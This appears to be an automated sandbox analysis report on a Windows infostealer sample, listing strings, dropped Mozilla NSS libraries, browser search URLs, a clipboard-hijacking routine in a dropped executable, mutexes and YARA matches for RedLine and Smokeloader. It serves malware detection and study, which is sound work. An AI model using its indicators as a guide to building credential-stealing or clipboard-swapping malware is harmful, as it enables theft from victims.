Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: Amcache.hve.9.dr String found in binary or memory: http://upx.sf.net
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: YEnIrzZUUw.exe, YEnIrzZUUw.exe, 00000000.00000002.2266334227.000000006C95D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: YEnIrzZUUw.exe, 00000000.00000002.2266044353.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, YEnIrzZUUw.exe, 00000000.00000002.2257348978.000000001E639000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: YEnIrzZUUw.exe, 00000000.00000003.1766250297.00000000042AB000.00000004.00000020.00020000.00000000.sdmp, FIDHCFBA.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: YEnIrzZUUw.exe, 00000000.00000003.1766250297.00000000042AB000.00000004.00000020.00020000.00000000.sdmp, FIDHCFBA.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: YEnIrzZUUw.exe, 00000000.00000003.1766250297.00000000042AB000.00000004.00000020.00020000.00000000.sdmp, FIDHCFBA.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: YEnIrzZUUw.exe, 00000000.00000003.1766250297.00000000042AB000.00000004.00000020.00020000.00000000.sdmp, FIDHCFBA.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: YEnIrzZUUw.exe, 00000000.00000003.1766250297.00000000042AB000.00000004.00000020.00020000.00000000.sdmp, FIDHCFBA.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: YEnIrzZUUw.exe, 00000000.00000003.1766250297.00000000042AB000.00000004.00000020.00020000.00000000.sdmp, FIDHCFBA.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: YEnIrzZUUw.exe, 00000000.00000003.1766250297.00000000042AB000.00000004.00000020.00020000.00000000.sdmp, FIDHCFBA.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: HIEBAKEHDHCAKEBFBKEGCGIEBF.0.dr String found in binary or memory: https://support.mozilla.org
Source: HIEBAKEHDHCAKEBFBKEGCGIEBF.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HIEBAKEHDHCAKEBFBKEGCGIEBF.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp, YEnIrzZUUw.exe, 00000000.00000003.1760827412.00000000245BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp, YEnIrzZUUw.exe, 00000000.00000003.1760827412.00000000245BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: YEnIrzZUUw.exe, 00000000.00000003.1766250297.00000000042AB000.00000004.00000020.00020000.00000000.sdmp, FIDHCFBA.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: YEnIrzZUUw.exe, 00000000.00000003.1766250297.00000000042AB000.00000004.00000020.00020000.00000000.sdmp, FIDHCFBA.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: HIEBAKEHDHCAKEBFBKEGCGIEBF.0.dr String found in binary or memory: https://www.mozilla.org
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: HIEBAKEHDHCAKEBFBKEGCGIEBF.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: HIEBAKEHDHCAKEBFBKEGCGIEBF.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: YEnIrzZUUw.exe, 00000000.00000003.1857943748.000000002A7D3000.00000004.00000020.00020000.00000000.sdmp, HIEBAKEHDHCAKEBFBKEGCGIEBF.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: HIEBAKEHDHCAKEBFBKEGCGIEBF.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: YEnIrzZUUw.exe, 00000000.00000003.1857943748.000000002A7D3000.00000004.00000020.00020000.00000000.sdmp, HIEBAKEHDHCAKEBFBKEGCGIEBF.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_00532590 CreateMutexA,GetLastError,ExitProcess,OpenClipboard,GetClipboardData,GlobalFix,EmptyClipboard,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,GlobalFree,CloseClipboard,Sleep, 7_2_00532590
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_00532590 CreateMutexA,GetLastError,ExitProcess,OpenClipboard,GetClipboardData,GlobalFix,EmptyClipboard,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,GlobalFree,CloseClipboard,Sleep, 7_2_00532590
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_00532590 CreateMutexA,GetLastError,ExitProcess,OpenClipboard,GetClipboardData,GlobalFix,EmptyClipboard,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,GlobalFree,CloseClipboard,Sleep, 7_2_00532590

System Summary

barindex
Source: 00000000.00000002.2245990015.00000000041E5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2245886678.0000000004190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C90ED10 malloc,NtFlushVirtualMemory,memset,LdrInitializeThunk,memset,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 0_2_6C90ED10
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C94B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C94B700
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C94B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C94B8C0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C94B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C94B910
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C8EF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C8EF280
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C8E35A0 0_2_6C8E35A0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C8F6C80 0_2_6C8F6C80
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C9434A0 0_2_6C9434A0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C94C4A0 0_2_6C94C4A0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C90D4D0 0_2_6C90D4D0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C8F64C0 0_2_6C8F64C0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C926CF0 0_2_6C926CF0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C8ED4E0 0_2_6C8ED4E0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C925C10 0_2_6C925C10
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C932C10 0_2_6C932C10
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C95AC00 0_2_6C95AC00
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C95542B 0_2_6C95542B
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C95545C 0_2_6C95545C
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C8F5440 0_2_6C8F5440
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C920DD0 0_2_6C920DD0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C9485F0 0_2_6C9485F0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C90ED10 0_2_6C90ED10
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C910512 0_2_6C910512
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C8FFD00 0_2_6C8FFD00
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C905E90 0_2_6C905E90
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C94E680 0_2_6C94E680
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C944EA0 0_2_6C944EA0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C9576E3 0_2_6C9576E3
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C8EBEF0 0_2_6C8EBEF0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C8FFEF0 0_2_6C8FFEF0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C927E10 0_2_6C927E10
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C935600 0_2_6C935600
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C949E30 0_2_6C949E30
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C909E50 0_2_6C909E50
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C923E50 0_2_6C923E50
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C904640 0_2_6C904640
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C932E4E 0_2_6C932E4E
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C956E63 0_2_6C956E63
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C8EC670 0_2_6C8EC670
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C9377A0 0_2_6C9377A0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C916FF0 0_2_6C916FF0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C8EDFE0 0_2_6C8EDFE0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C927710 0_2_6C927710
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C8F9F00 0_2_6C8F9F00
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C9160A0 0_2_6C9160A0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C9550C7 0_2_6C9550C7
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C90C0E0 0_2_6C90C0E0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C9258E0 0_2_6C9258E0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C8F7810 0_2_6C8F7810
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C92B820 0_2_6C92B820
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C934820 0_2_6C934820
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C908850 0_2_6C908850
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C90D850 0_2_6C90D850
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C92F070 0_2_6C92F070
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C925190 0_2_6C925190
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C942990 0_2_6C942990
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C91D9B0 0_2_6C91D9B0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C8EC9A0 0_2_6C8EC9A0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C90A940 0_2_6C90A940
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C93B970 0_2_6C93B970
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C95B170 0_2_6C95B170
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C8FD960 0_2_6C8FD960
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C95BA90 0_2_6C95BA90
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C952AB0 0_2_6C952AB0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C8E22A0 0_2_6C8E22A0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C914AA0 0_2_6C914AA0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C8FCAB0 0_2_6C8FCAB0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C928AC0 0_2_6C928AC0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C901AF0 0_2_6C901AF0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C92E2F0 0_2_6C92E2F0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C929A60 0_2_6C929A60
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C8EF380 0_2_6C8EF380
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C9553C8 0_2_6C9553C8
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C92D320 0_2_6C92D320
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C8E5340 0_2_6C8E5340
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C8FC370 0_2_6C8FC370
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C9EECD0 0_2_6C9EECD0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C98ECC0 0_2_6C98ECC0
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6CA6AC30 0_2_6CA6AC30
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6CA56C00 0_2_6CA56C00
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C99AC60 0_2_6C99AC60
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_00589063 7_2_00589063
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_00587830 7_2_00587830
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_0058A988 7_2_0058A988
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_00531A40 7_2_00531A40
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_0058B29C 7_2_0058B29C
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_0058BB06 7_2_0058BB06
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_00592BD5 7_2_00592BD5
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_00585C20 7_2_00585C20
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_00535500 7_2_00535500
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_0058B6D1 7_2_0058B6D1
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_0058AE84 7_2_0058AE84
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: 7_2_00593759 7_2_00593759
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: String function: 00588810 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Code function: String function: 00589E8D appears 31 times
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: String function: 6C91CBE8 appears 134 times
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: String function: 6C9294D0 appears 90 times
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: String function: 004043B0 appears 316 times
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7428 -s 2204
Source: YEnIrzZUUw.exe, 00000000.00000002.2266401689.000000006C972000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs YEnIrzZUUw.exe
Source: YEnIrzZUUw.exe, 00000000.00000002.2245757080.0000000004023000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameFirezer( vs YEnIrzZUUw.exe
Source: YEnIrzZUUw.exe, 00000000.00000002.2266837977.000000006CB65000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs YEnIrzZUUw.exe
Source: YEnIrzZUUw.exe Binary or memory string: OriginalFilenameFirezer( vs YEnIrzZUUw.exe
Source: YEnIrzZUUw.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2245990015.00000000041E5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2245886678.0000000004190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/40@0/2
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_6C947030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C947030
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00415D00
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Mutant created: \Sessions\1\BaseNamedObjects\8dddf1vvvv
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7428
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File created: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Command line argument: 8dddf1vvvv 7_2_00532590
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Command line argument: 8dddf1vvvv 7_2_00532590
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Command line argument: f1vvvv 7_2_00532590
Source: C:\Users\user\AppData\Local\Temp\IDBAKKECAE.exe Command line argument: 8dddf1vvvv 7_2_00532590
Source: YEnIrzZUUw.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe File read: C:\Program Files (x86)\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: YEnIrzZUUw.exe, 00000000.00000002.2265884130.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, YEnIrzZUUw.exe, 00000000.00000002.2257348978.000000001E639000.00000004.00000020.00020000.00000000.sdmp, YEnIrzZUUw.exe, 00000000.00000002.2266689058.000000006CB1F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: YEnIrzZUUw.exe, 00000000.00000002.2265884130.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, YEnIrzZUUw.exe, 00000000.00000002.2257348978.000000001E639000.00000004.00000020.00020000.00000000.sdmp, YEnIrzZUUw.exe, 00000000.00000002.2266689058.000000006CB1F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
